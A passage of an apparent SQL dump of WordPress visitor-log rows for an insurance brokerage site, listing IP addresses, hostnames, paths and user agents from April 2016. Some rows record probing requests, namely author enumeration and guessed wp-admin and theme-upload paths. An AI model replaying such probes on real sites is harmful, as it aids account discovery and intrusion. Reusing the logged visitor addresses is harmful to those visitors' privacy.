Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18249,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902134','188.165.234.52','crawl04.lp.007ac9.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18251,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902137','188.165.234.52','crawl04.lp.007ac9.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18252,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902140','188.165.234.52','crawl04.lp.007ac9.net','/?page_id=169','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18254,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902142','188.165.234.52','crawl04.lp.007ac9.net','/about-us/meet-the-eib-team/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18257,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902145','188.165.234.52','crawl04.lp.007ac9.net','/members/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18258,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902149','188.165.234.52','crawl04.lp.007ac9.net','/meet-the-eib-team/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18261,'0b_899ae133a3cee5addfb1a6c480135751','1460904310','181.30.30.166','166-30-30-181.fibertel.com.ar','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ar','','','Unknown Spider','','','','3','0',0),(18263,'0b_899ae133a3cee5addfb1a6c480135751','1460904311','181.30.30.166','166-30-30-181.fibertel.com.ar','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ar','','','Unknown Spider','','','','3','0',0),(18264,'0b_b3a429fd46e1c5c81812498893db2ca7','1460905386','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18267,'0b_b3a429fd46e1c5c81812498893db2ca7','1460905389','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18269,'0b_b3a429fd46e1c5c81812498893db2ca7','1460905391','69.175.22.218','newscan02.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18272,'0b_b3a429fd46e1c5c81812498893db2ca7','1460905394','69.175.22.218','newscan02.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18273,'0b_b3a429fd46e1c5c81812498893db2ca7','1460905396','69.175.22.218','newscan02.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18276,'0b_b3a429fd46e1c5c81812498893db2ca7','1460905398','69.175.22.218','newscan02.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18278,'0b_b3a429fd46e1c5c81812498893db2ca7','1460905400','69.175.22.218','newscan02.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18281,'0b_6db24cff21e8c1690625ad8330032612','1460905864','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18284,'0b_6db24cff21e8c1690625ad8330032612','1460905873','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18285,'0b_6db24cff21e8c1690625ad8330032612','1460905884','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18287,'0b_89c596ec58ac3d17715c70f36fdc641b','1460906023','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18290,'0b_6db24cff21e8c1690625ad8330032612','1460906771','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18293,'0b_6db24cff21e8c1690625ad8330032612','1460906781','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18296,'0b_6db24cff21e8c1690625ad8330032612','1460906792','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18299,'0b_a07a40a263ce008b631a1305f496901b','1460907628','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18302,'0b_e7f54d318bcdc3d2e928b89b01a35d84','1460908983','165.231.2.234','165.231.2.234','/?author=1','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1','','',0,'WinXP','IE 7','','','','','','','','0','0',0),(18303,'0b_e7f54d318bcdc3d2e928b89b01a35d84','1460909009','165.231.2.234','165.231.2.234','/?author=2','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1','','',0,'WinXP','IE 7','','','','','','','','0','0',0),(18305,'0b_e7f54d318bcdc3d2e928b89b01a35d84','1460909028','165.231.2.234','165.231.2.234','/?author=3','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1','','',0,'WinXP','IE 7','','','','','','','','0','0',0),(18308,'0b_b2079ba4f5da9b8de86ed5f3eb239081','1460913793','45.33.36.127','li986-127.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(18311,'0b_89244f21d54fe10ef157660fe3b2f8f5','1460915504','74.89.26.94','ool-4a591a5e.dyn.optonline.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com.pg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwift7emnpbMAhVBPj4KHcPRDTQQFggZMAA&url=http%3A%2F%2Fwww.empireins.com%2Fmeet-the-eib-team%2F&usg=AFQjCNFOb2zx9dj5NajK0tLdcu2vBluCuQ&bvm=bv.119745492,d.cWw','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18312,'0b_5ec4bbe43e3406d793df84c70fca3c11','1460918757','148.251.153.69','static.69.153.251.148.clients.your-server.de','/calc.html','WordPress/4.3.2; http://mortgagebeneficiary.com','','',0,'','','de','','','WordPress','','','','0','0',0),(18315,'0b_bbb63fd48b16f7129a9f8abd2e52b474','1460920820','157.55.39.114','msnbot-157-55-39-114.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18317,'0b_6ac3b6252d05103b19aca9f8e74ecdb1','1460921528','151.80.44.115','mj5.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(18320,'0b_6ac3b6252d05103b19aca9f8e74ecdb1','1460921535','151.80.44.115','mj5.naefmarco.ch','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(18323,'0b_acfd94a5532e8317049846b156c73d46','1460922232','96.56.120.218','ool-603878da.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwikhZutt5bMAhWJWD4KHQT3AdQQFggdMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&sig2=SLvCRBNydm7u3a2KJYmm3Q&bvm=bv.119745492,d.cWw','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(18324,'0b_acfd94a5532e8317049846b156c73d46','1460922235','96.56.120.218','ool-603878da.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(18326,'0b_acfd94a5532e8317049846b156c73d46','1460922252','96.56.120.218','ool-603878da.static.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(18329,'0b_acfd94a5532e8317049846b156c73d46','1460922291','96.56.120.218','ool-603878da.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/contact/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(18332,'0b_37795f2100176a550e860113ef395cf7','1460924857','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18333,'0b_1920666749ff7ba1f398029103eed8e5','1460925391','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18335,'0b_1920666749ff7ba1f398029103eed8e5','1460925392','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18338,'0b_1920666749ff7ba1f398029103eed8e5','1460925393','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18341,'0b_1920666749ff7ba1f398029103eed8e5','1460925394','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18344,'0b_1920666749ff7ba1f398029103eed8e5','1460925395','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18347,'0b_1920666749ff7ba1f398029103eed8e5','1460925395','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18348,'0b_dfa80610955140d1ff9f09596a60c809','1460925403','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18351,'0b_dfa80610955140d1ff9f09596a60c809','1460925403','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18353,'0b_dfa80610955140d1ff9f09596a60c809','1460925404','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18356,'0b_43c79becd4d2c06627ea9276c152be60','1460925440','157.55.39.114','msnbot-157-55-39-114.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18357,'0b_43c79becd4d2c06627ea9276c152be60','1460925440','157.55.39.114','msnbot-157-55-39-114.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18359,'0b_43c79becd4d2c06627ea9276c152be60','1460925441','157.55.39.114','msnbot-157-55-39-114.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18362,'0b_43c79becd4d2c06627ea9276c152be60','1460925819','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18365,'0b_ccdd3eaa378a5493c860cc772192a726','1460928170','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(18368,'0b_d9e7eb46abb45a48b91b305f774bbc20','1460929387','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18371,'0b_d9e7eb46abb45a48b91b305f774bbc20','1460929390','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18374,'0b_9fc94aa04ce596e590c6f59414de37df','1460930681','157.55.39.114','msnbot-157-55-39-114.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(18375,'0b_46f61b858f4b9e01be5de801b188269f','1460931467','101.178.172.70','101.178.172.70','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com.au/','_notprovided_',1,'Win7','Chrome 49','au','1600 x 900','Google AU','','','','','0','0',0),(18378,'0b_46f61b858f4b9e01be5de801b188269f','1460931480','101.178.172.70','101.178.172.70','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(18380,'0b_46f61b858f4b9e01be5de801b188269f','1460931500','101.178.172.70','101.178.172.70','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(18381,'0b_07982f2cd540ef6f5c355efaced28983','1460932125','66.249.64.94','crawl-66-249-64-94.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18384,'0b_fd9c815cce5a6296a9801cd062b296f0','1460932567','64.71.32.25','lsh1012.siteprotect.com','/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(18387,'0b_d10e98b589b26d40ca462ef35b3e2eef','1460933023','72.10.32.34','new-welovedesign.uk','/test/wp-admin/','','','',0,'','','gb','','','Unknown Spider','','','','0','0',0),(18389,'0b_bdd11299fd3be1f80df94efc6b0797e3','1460933442','79.170.40.182','web182.extendcp.co.uk','/wordpress/wp-admin/','','','',0,'','','gb','','','Unknown Spider','','','','0','0',0),(18392,'0b_54cbb98f78d8c10e5fe43e1cc1048242','1460933455','70.214.77.175','175.sub-70-214-77.myvzw.com','/','Mozilla/5.0 (Linux; Android 5.1; QTAIR7 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Safari/537.36','','',0,'Android 5','Chrome 47','us','800 x 1280','','','','','','0','0',0),(18393,'0b_54cbb98f78d8c10e5fe43e1cc1048242','1460933457','70.214.77.175','175.sub-70-214-77.myvzw.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1; QTAIR7 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 47','us','800 x 1280','','','','','','0','0',0),(18396,'0b_54cbb98f78d8c10e5fe43e1cc1048242','1460933467','70.214.77.175','175.sub-70-214-77.myvzw.com','/contact/','Mozilla/5.0 (Linux; Android 5.1; QTAIR7 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 47','us','800 x 1280','','','','','','0','0',0),(18399,'0b_54cbb98f78d8c10e5fe43e1cc1048242','1460933565','70.214.77.175','175.sub-70-214-77.myvzw.com','/carriers/','Mozilla/5.0 (Linux; Android 5.1; QTAIR7 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Safari/537.36','http://www.empireins.com/contact/','',0,'Android 5','Chrome 47','us','800 x 1280','','','','','','0','51',0),(18402,'0b_54cbb98f78d8c10e5fe43e1cc1048242','1460933575','70.214.77.175','175.sub-70-214-77.myvzw.com','/about-us/','Mozilla/5.0 (Linux; Android 5.1; QTAIR7 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Safari/537.36','http://www.empireins.com/carriers/','',0,'Android 5','Chrome 47','us','800 x 1280','','','','','','0','51',0),(18404,'0b_54cbb98f78d8c10e5fe43e1cc1048242','1460933606','70.214.77.175','175.sub-70-214-77.myvzw.com','/','Mozilla/5.0 (Linux; Android 5.1; QTAIR7 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Safari/537.36','http://www.empireins.com/about-us/','',0,'Android 5','Chrome 47','us','800 x 1280','','','','','','0','51',0),(18405,'0b_54cbb98f78d8c10e5fe43e1cc1048242','1460933606','70.214.77.175','175.sub-70-214-77.myvzw.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1; QTAIR7 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 47','us','800 x 1280','','','','','','0','0',0),(18407,'0b_33b25bf0b17c2409629932036b151f1d','1460933710','94.23.214.33','ns304676.ip-94-23-214.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18410,'0b_33b25bf0b17c2409629932036b151f1d','1460933712','94.23.214.33','ns304676.ip-94-23-214.eu','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18413,'0b_33b25bf0b17c2409629932036b151f1d','1460933714','94.23.214.33','ns304676.ip-94-23-214.eu','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18414,'0b_4f60025f6e20eed267b9788b2958e3b5','1460933887','210.172.144.236','users122.phy.lolipop.jp','/blog/wp-admin/','','','',0,'','','jp','','','Unknown Spider','','','','0','0',0),(18417,'0b_91f852c15c5a58f8dfb92bcf89972da8','1460934321','62.210.131.104','rich-host.com.ua','/wp/wp-admin/','','','',0,'','','ua','','','Unknown Spider','','','','0','0',0),(18420,'0b_45b4530467da908faf964b6ffb8e7f50','1460934481','188.163.110.39','sol-fttb.39.110.163.188.sovam.net.ua','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','ua','','','','','','','3','0',0),(18422,'0b_45b4530467da908faf964b6ffb8e7f50','1460934483','188.163.110.39','sol-fttb.39.110.163.188.sovam.net.ua','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','ua','','','','','','','3','0',0),(18425,'0b_2f929186fe67752fce5b0c0f7d07dc0b','1460934755','219.94.129.86','www1076.sakura.ne.jp','/old/wp-admin/','','','',0,'','','jp','','','Unknown Spider','','','','0','0',0),(18428,'0b_c5575d986100848ad8aeb04f954cd547','1460938473','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18431,'0b_d93c8325ac8ca117242b9756d62bfe1f','1460938534','62.210.143.245','mj8.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(18432,'0b_d93c8325ac8ca117242b9756d62bfe1f','1460938537','62.210.143.245','mj8.naefmarco.ch','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(18435,'0b_3f8450cc109c1ed8aa1c1d35c6e11dc1','1460938864','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18438,'0b_3f8450cc109c1ed8aa1c1d35c6e11dc1','1460938867','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18440,'0b_3f8450cc109c1ed8aa1c1d35c6e11dc1','1460938869','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18441,'0b_3f8450cc109c1ed8aa1c1d35c6e11dc1','1460938869','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18444,'0b_3f8450cc109c1ed8aa1c1d35c6e11dc1','1460938870','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18447,'0b_3f8450cc109c1ed8aa1c1d35c6e11dc1','1460938871','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18450,'0b_3f8450cc109c1ed8aa1c1d35c6e11dc1','1460938871','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18453,'0b_5de263549d492a7974aac8fdac442654','1460938924','5.9.89.170','static.170.89.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(18456,'0b_5de263549d492a7974aac8fdac442654','1460938926','5.9.89.170','static.170.89.9.5.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(18459,'0b_5de263549d492a7974aac8fdac442654','1460938930','5.9.89.170','static.170.89.9.5.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(18461,'0b_5de263549d492a7974aac8fdac442654','1460938933','5.9.89.170','static.170.89.9.5.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(18464,'0b_5de263549d492a7974aac8fdac442654','1460938936','5.9.89.170','static.170.89.9.5.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(18467,'0b_5de263549d492a7974aac8fdac442654','1460938938','5.9.89.170','static.170.89.9.5.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(18468,'0b_e03c0abc99e83cc89eaab2ad535c0c3f','1460940159','91.210.144.223','91.210.144.223','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ru','','','','','','','0','0',0),(18471,'0b_5dd9950d0850eb0b6f568e098ff6ae6b','1460942055','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18473,'0b_5dd9950d0850eb0b6f568e098ff6ae6b','1460942066','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18476,'0b_5dd9950d0850eb0b6f568e098ff6ae6b','1460942077','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; 